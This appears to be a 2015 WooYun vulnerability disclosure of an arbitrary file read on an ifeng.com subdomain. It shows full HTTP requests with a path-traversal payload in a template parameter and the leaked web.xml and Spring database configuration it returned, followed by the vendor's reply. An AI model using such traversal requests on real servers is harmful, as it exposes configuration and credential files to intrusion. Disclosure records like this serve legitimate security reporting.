当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0102889

漏洞标题:凤凰网某站任意文件读取

相关厂商:凤凰网

漏洞作者: 路人甲

提交时间:2015-03-21 22:22

修复时间:2015-05-07 09:54

公开时间:2015-05-07 09:54

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-21: 细节已通知厂商并且等待厂商处理中
2015-03-23: 厂商已经确认,细节仅向厂商公开
2015-04-02: 细节向核心白帽子及相关领域专家公开
2015-04-12: 细节向普通白帽子公开
2015-04-22: 细节向实习白帽子公开
2015-05-07: 细节向公众公开

简要描述:

详细说明:

网站:hd.ifeng.com
模版参数没有校验
请求

GET /city/city.d?u_id=23157ea9-ce30-4ec9-93dd-8b130ca67be65a6347&m=chg&city=%E4%B8%8A%E6%B5%B7&t=..%2f..%2f..%2f..%2fWEB-INF%2fweb.xml HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: hd.ifeng.com
Accept-Encoding: gzip, deflate


返回 

HTTP/1.1 200 OK
Date: Sat, xx Mar 2015 xxxx GMT
Server: Apache/2.0.54 (Unix) Resin/3.0.26 PHP/5.2.3
Vary: Accept-Encoding
Content-Language: en-US
ETag: "BpV48e5vVyd"
Last-Modified: Sun, 21 Sep 2014 10:22:47 GMT
Content-Length: 7442
Set-Cookie: city=021; domain=.aibang.com; path=/; expires=Sat, 
Content-Type: text/xml
Connection: close
<?xml version="1.0" encoding="UTF-8"?>
<web-app version="2.4" xmlns="http://java.sun.com/xml/ns/j2ee"
	xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
	xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee 
	http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd">
	
	<context-param>
		<param-name>contextConfigLocation</param-name>
		<param-value>
			/WEB-INF/SPRING-CONF/applicationContext.xml
			/WEB-INF/SPRING-CONF/applicationContext-db.xml
			/WEB-INF/SPRING-CONF/applicationContext-ibatis.xml
		</param-value>
	</context-param>
	
	<filter>
		<filter-name>encoding</filter-name>
		<filter-class>com.aibang.wap.filter.WapFilter</filter-class>
	</filter>
	<filter>
		<filter-name>authFilter</filter-name>
		<filter-class>com.aibang.wap.filter.AuthFilter</filter-class>		
	</filter>
	<filter>
		<filter-name>tuanAuthFilter</filter-name>
		<filter-class>com.aibang.wap.filter.TuanAuthFilter</filter-class>		
	</filter>
	
	<filter-mapping>
		<filter-name>encoding</filter-name>
		<url-pattern>/*</url-pattern>
	</filter-mapping>
	
	<filter-mapping>
		<filter-name>authFilter</filter-name>
		<url-pattern>/user/*</url-pattern>
	</filter-mapping>
	
	<filter-mapping>
		<filter-name>tuanAuthFilter</filter-name>
		<url-pattern>/tuan/*</url-pattern>
	</filter-mapping>
	
	<filter-mapping>
		<filter-name>authFilter</filter-name>
		<url-pattern>/sms/*</url-pattern>
	</filter-mapping>
。。。。。。。。。
。。。。。。。。。。。。。。


请求

GET /city/city.d?u_id=23157ea9-ce30-4ec9-93dd-8b130ca67be65a6347&m=chg&city=%E4%B8%8A%E6%B5%B7&t=..%2f..%2f..%2f..%2fWEB-INF%2fSPRING-CONF%2fapplicationContext-db.xml HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: hd.ifeng.com
Accept-Encoding: gzip, deflate


返回

HTTP/1.1 200 OK
Date: Sat, xxx
Server: Apache/2.0.54 (Unix) Resin/3.0.26 PHP/5.2.3
Vary: Accept-Encoding
Content-Language: en-US
ETag: "BpWEaVUhZ5h"
Last-Modified: Sun, 21 Sep 2014 10:22:49 GMT
Content-Length: 11078
Set-Cookie: city=021; domain=.aibang.com; path=/; expires=Sun, 
Connection: close
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE beans PUBLIC "-//SPRING//DTD BEAN//EN" "http://www.springframework.org/dtd/spring-beans.dtd">
<beans>
	<bean id="propertyConfigurer" class="org.wolf.web.context.WfPropertyPlaceholderConfigurer"/>
	<bean id="ituands"
		class="org.logicalcobwebs.proxool.ProxoolDataSource"
		lazy-init="false">
		<property name="driver">
			<value>com.mysql.jdbc.Driver</value>
		</property>
		<property name="driverUrl">
			<value>${ituan.db}</value>
		</property>
		<property name="user">
			<value>${ituan.user}</value>
		</property>
		<property name="password">
			<value>${ituan.pwd}</value>
		</property>
		<property name="alias">
			<value>ituands</value>
		</property>
		<property name="houseKeepingSleepTime">
			<value>300000</value>
		</property>
		<property name="prototypeCount">
			<value>5</value>
		</property>
		<property name="maximumConnectionCount">
			<value>200</value>
		</property>
		<property name="minimumConnectionCount">
			<value>2</value>
		</property>
		<property name="trace">
			<value>true</value>
		</property>
		<property name="verbose">
			<value>true</value>
		</property>
	</bean>
	<bean id="wapds"
		class="org.logicalcobwebs.proxool.ProxoolDataSource"
		lazy-init="false">
		<property name="driver">
			<value>com.mysql.jdbc.Driver</value>
		</property>
		<property name="driverUrl">
			<value>${wap.db}</value>
		</property>
		<property name="user">
			<value>${wap.user}</value>
		</property>
		<property name="password">
			<value>${wap.pwd}</value>
		</property>
		<property name="alias">
			<value>wapds</value>
		</property>
		<property name="houseKeepingSleepTime">
			<value>300000</value>
		</property>
		<property name="prototypeCount">
			<value>5</value>
		</property>
		<property name="maximumConnectionCount">
			<value>300</value>
		</property>
。。。。。。。。。。。
。。。。。。。。。。。。。。。


漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2015-03-23 09:53

厂商回复:

谢谢,这个业务不是我们的,访问一下网站的域名您就知道这是爱帮的业务,我们尽快联系他们进行修复。

最新状态:

暂无